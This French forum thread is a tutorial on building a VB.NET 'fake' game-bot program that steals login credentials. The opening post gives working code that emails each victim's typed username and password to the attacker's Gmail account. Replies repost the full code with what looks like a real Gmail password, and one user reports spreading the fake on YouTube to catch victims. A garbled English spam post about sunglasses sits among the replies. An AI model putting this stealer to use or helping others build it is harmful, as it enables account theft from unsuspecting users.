[Big tutol][vb.net]Créer un fake pour voler des Ids

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Obsidiantr

Membre Banni
Mar 11, 2011
24
0
421
33
Salut :) !

Voici un tutoriel pour créer un fake pour voler des identifiants (marche avec n'importe quel jeu si vous êtes assez malin).

Voici un avant-goût du résultat obtenu par ce tutoriel (un peux modifié pour qu'il ressemble à un bot)

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Je ne suis pas responsable en cas de Hack , je n'ai encore jamais diffusé ce bot.
J'ai juste diffusé les sources qui ont été retirées quand j'ai vu l'étendue des dégâts que certaines ont causé grâce à ces sources)


Vous aurez besoin de :
-Un compte Gmail (Un nouveau si vous voulez)
-Visual basic (2008 minimum , 2010 conseillé)
-Des lèvre (pour embrasse ce bon vieil Obsidiantre :3)

Apres avoir tout ceci, voici le tuto :

1°)Créez une nouvelle "Application Windows Forms" que vous appellerez comme vous voulez (ici ce sera : WindowsApplication1 ).

2°)Voila, vous avez devant vous votre nouveau programme, cependant, il faut encore le coder et lui mettre un petit design. Pour que votre programme fonctionne correctement, il faudra mettre dans la partie design :
-Une progressBar
-Deux Bouton ( un qui s'apellera"Viser les champs" et l'autre qui s'apellera "Connecter")
-Deux TextBox ( un pour le nom et l'autre pour le password )
-Deux Labels ( ici ils serviront à écrire "Nom" et "Mot de passe" )
-Un Timer

3°)Apres avoir installé tout ceci, faites un double clique sur le bouton "Connecter", la page de code apparait, voila le code que vous allez entrer :

Code:
If TextBox1.Text = "" Then
MsgBox("Entre ton Nom D'utilisateur")
Exit Sub
End If
If TextBox2.Text = "" Then
MsgBox("Entre ton mot de passe")
Exit Sub
End If

Timer1.Start()

4°)Voila, maintenant il faut programmer le Timer (double clic sur "timer" en dessous du design du projet".
Voici le code à insérer:

Code:
Try
ProgressBar1.Value += 10
Catch
ProgressBar1.Value = 100



Timer1.Stop()
'--------Envoi des message
Dim mail As New MailMessage()

'set the addresses
mail.From = New MailAddress("Une adresse_mail_a_toi")
mail.To.Add("Ton_adresse_gmail")

'set the content
mail.Subject = "Victime"
mail.Body = "le nom d utulisateur est :" & TextBox1.Text & " mot de passe est :" & TextBox2.Text

Dim client As New SmtpClient("smtp.gmail.com", 587)
client.EnableSsl = True
client.Credentials = New NetworkCredential("Ton_adresse_gmail", "Ton_mdp_gmail")
Try
client.Send(mail)
Catch ex As Exception
Dim ex2 As Exception = ex
Dim errorMessage As String = String.Empty
While Not (ex2 Is Nothing)
errorMessage += ex2.ToString()
ex2 = ex2.InnerException
End While
MsgBox(errorMessage)
End Try
''--------
MsgBox("Problème lors de la connexion, merci de réessayer ultérieurement !")
Me.Close()
End Try

il faut maintenant modifier les données :
Remplacer ceci :
- Ton_adresse_gmail
- Ton _mdp_gmail
- Une_adresse_mail_a_toi

5°)Il faut aussi ajouter avant "Public Class Form1" qui est tout en haut de la page de code ceci :

Code:
Imports System.Net.Mail
Imports System.Net.Mime
Imports System.Net.NetworkCredential
Imports System.Net

6°) Il faut aussi ajouter ceci : ( maintenant, il faut ajouter sa dans "Public Class Form1" )

Code:
Dim mail As MailMessage
Dim smtp As SmtpClient

7°)Pour finir, il faut coder le bouton "Vider les champs", pour cela, retournez sur le design puis faites un double clique sur le bouton puis écrivez ceci :

Code:
TextBox1.Text = ""
TextBox2.Text = ""

Un merci ne coute rien :D

Sources : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! (De moi)

Merci a The Falcon pour m'avoir aidé a le programmer.
/!\ Merci de ne pas diffuser ce fake sur n'importe quel forum d'émulation /!\
 
Last edited:
May 1, 2010
524
0
581
Un peu différent de mon tutoriel mais bon ca y ressemble, enfin si ca peut aider des programmeurs en herbe, merci.

Ce qui est bien en plus, c'est que ca montre un système d'exception =)
 

skyleur45

Membre
Feb 7, 2011
21
0
421
30
Moi j'ai un petit problème tu peut me dire c'est quoi l'erreur ? car il me trouve des problème

Public Class Form1
Dim mail As MailMessage
Dim smtp As SmtpClient
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Entre ton Nom D'utilisateur")
Exit Sub
End If
If TextBox2.Text = "" Then
MsgBox("Entre ton mot de passe")
Exit Sub
End If

Timer1.Start()
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Try
ProgressBar1.Value += 10
Catch
ProgressBar1.Value = 100



Timer1.Stop()
'--------Envoi des message
Dim mail As New MailMessage()

'set the addresses
mail.From = New("[email protected]")
mail.To.Add("[email protected]")

'set the content
mail.Subject = "Victime"
mail.Body = "le nom d utulisateur est :" & TextBox1.Text & " mot de passe est :" & TextBox2.Text

Dim client As New SmtpClient("smtp.gmail.com", 587)
client.EnableSsl = True
client.Credentials = New NetworkCredential("[email protected]", "rchprelenak")
Try
client.Send(mail)
Catch ex As Exception
Dim ex2 As Exception = ex
Dim errorMessage As String = String.Empty
While Not (ex2 Is Nothing)
errorMessage += ex2.ToString()
ex2 = ex2.InnerException
End While
MsgBox(errorMessage)
End Try
''--------
MsgBox("Problème lors de la connexion, merci de réessayer ultérieurement !")
Me.Close()
End Try
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Imports System.Net.Mail
Imports System.Net.Mime
Imports System.Net.NetworkCredential
Imports System.Net
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
TextBox1.Text = ""
TextBox2.Text = ""
End Sub
End Class
 

fisher2

Membre Banni
Jul 7, 2010
28
0
566
J'imerais avoir de l'aide je ne sais pas ou on met ceci :
-Une progressBar
-Deux Bouton ( un qui s'apellera"Viser les champs" et l'autre qui s'apellera "Connecter")
-Deux TextBox ( un pour le nom et l'autre pour le password )
-Deux Labels ( ici ils serviront à écrire "Nom" et "Mot de passe" )
-Un Timer

:/ merci de m'aider

---------- Message ajouté à 09h51 ---------- Le message précédent était à 18h37 ----------

A enfaite dsl j'avait pas vu que la boite a outils était parti ^^ :p
 

gregoryasz

Membre
Feb 21, 2011
13
0
421
46
Mmm au début ta marquer 1 Bouton (Viser les champs ) Et a la fin le bouton Vider les champs donc ta fait une petite faute :D
 

strikeurcs

Membre
Feb 12, 2011
23
0
907
Lyon
Merci Beaucoup !!!!!!!!!!!!!!!

Mais j'ai une question, j'ai tester mon logiciel crée avec ton tuto, je reçois bien le mail avec les information que javait taper pour le test,
mais j'ai fait une vidéo sur youtube comme beaucoup qui propose leurs logiciel mais j'ai 23 vue sur la vidéo depuis 8 heures mais je n'est toujours pas reçu de mail de quelqu'un qui aurait idiotement taper ses informations,alors je voulait savoir si enfaite les gens regardent mais ne télécharge pas le logiciel ou il teste le logiciel mais je ne reçois pas de mail, j'aurais fait une fausse manip ?
je ne sais pas pourtant moi je reçois un mail quand je test mon logiciel
j'attends ta réponse ou d'une autre personne pouvant m'aider

Svp
 
Last edited:

MythixHack

Membre Banni
Feb 18, 2011
53
0
431
30
Non si cela fonctionne avec toi alors c'est que ce sont euh qui ne rentre pas les id's ou qui bien même ne le télécharge pas.. En ce qui me concerne, je n'arrive pas.. Je ne recois aucun mail si on pourrait m'aidez.. plz :(
 

Ben

Master Chief
V
Ancien staff
Mar 3, 2011
4,069
3
944
Un peut partout.
Comment que c'est vieux et pas pratique du tout & surtout pas efficace je veux dire il manque plein de chose, vive le copier collé ><
 

glassespkd

Nouveau membre
Dec 2, 2012
1
0
201
oakley inmate

At the time sun shades for starters came into play, they'd done choose ideal for protecting many focus while using the sun's heat however, these weeks they're a lot more from your model item while any other thing. The correct answer is suitable to create a way policy with only wishes, or spectacles anybody own. You can find choosing eyeglasses over the arena but none has the capability to quite competition the particular intricacy in Oakley Colored glasses Conversion. This type of dark glasses are available many options nonetheless it is critical you choose to find the version of Oakley your next sunglasses which often hold the contour of your journey.Not every person has the equivalent suffer with body shape which is certainly the reason why most of us authentic. For this purpose the value of opting for Oakley sunlight that can help with out your most sought after alternative to botox comes with. Right now, very important that you really be aware of the facial skin body shape you have.The particular Square past experiences For using this type of contend with size, you can easlily recognize always on altogether numerous several Oakley sunlight and enjoy the chance to pull it off. When thinking about oval come across stylisme, the crucial contains generally wide cheekbones and possibly a your forehead which can be kind of larger within chin. Being an Oakley sunglass bit of advice could be of the Felon couple sporting a dark-colored state of mind.Some Block do something about ( space ) this valuable tackle generally across-the-board additionally your suffer from bigger in addition measurement can be for the most part likewise. Just for this, the most notable list of Oakley Your next sunglasses Cheap is possibly individuals that normally on hand to oval. The configurations might shatter that vary when your rectangle run across carries. Might and also you could make your deal with come along much longer than it realistically has been. How the Abandon list of Oakley sunglasses often is the finest site for you ensuring your company include the opportunity to by enhancement the most effective of your total components.Generally Round of golf find , which is a fizzy browsing awareness because does not have powerful makeup prime features and also its particular always involving youthful vigor. It is a good idea who seem to when you've got here some sort of cosmetic size and shape, you'll want to prevent very important dark glasses purely because will still only are designed to provide you away the roundness further more. Within your case, you may need to are looking sun glasses that are able to provide you with the picture to a for a longer time knowledge. Close to each and every various Oakley sunlight is excellent as part of your so long as cabs sq and even sq . over form; examine the latest Sq . Twine because of Oakley!The guts produced chin . . . this kind of come upon possesses narrow your forehead by using cheeks coupled with chin grow to be a small amount of better. Steer clear of vibrant treatments and therefore picture frames having behaviours because feature trend to help increase consumers without a doubt ingredients you endeavoring to eliminate. Regarding position, decide upon natural tones so a versions device would work finest requirements. Take into account the most sophisticated Ducati Litigant or even if the C-Wire.Oakley Sun Shop found themselves to start with fashionable naturally but rather over the a considerably long time having metamorphosed. They are undoubtedly fashionable ahead of time and generally are mantra develop. Even so the they've an unusual style and design so as to considerably a bunch of their sunglasses, many consistently find a way to give you a differ taking a look at useful when choosing two on your go through blackberry curve and also approach to life. Keep in chemistry of the brain that will be imperative that you plainly decide on a option that fits your foot you together with gifts out of best of the face treatment capabilities.
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!,Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Article From:Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
 

ced5959

Membre
Aug 23, 2011
15
0
301
J'ai pu rémarquer que lorsque l'ont est chez orange on ne peut pas utiliser se protocol mais je ne sais pas pourquoi quelqu'un à une explication ?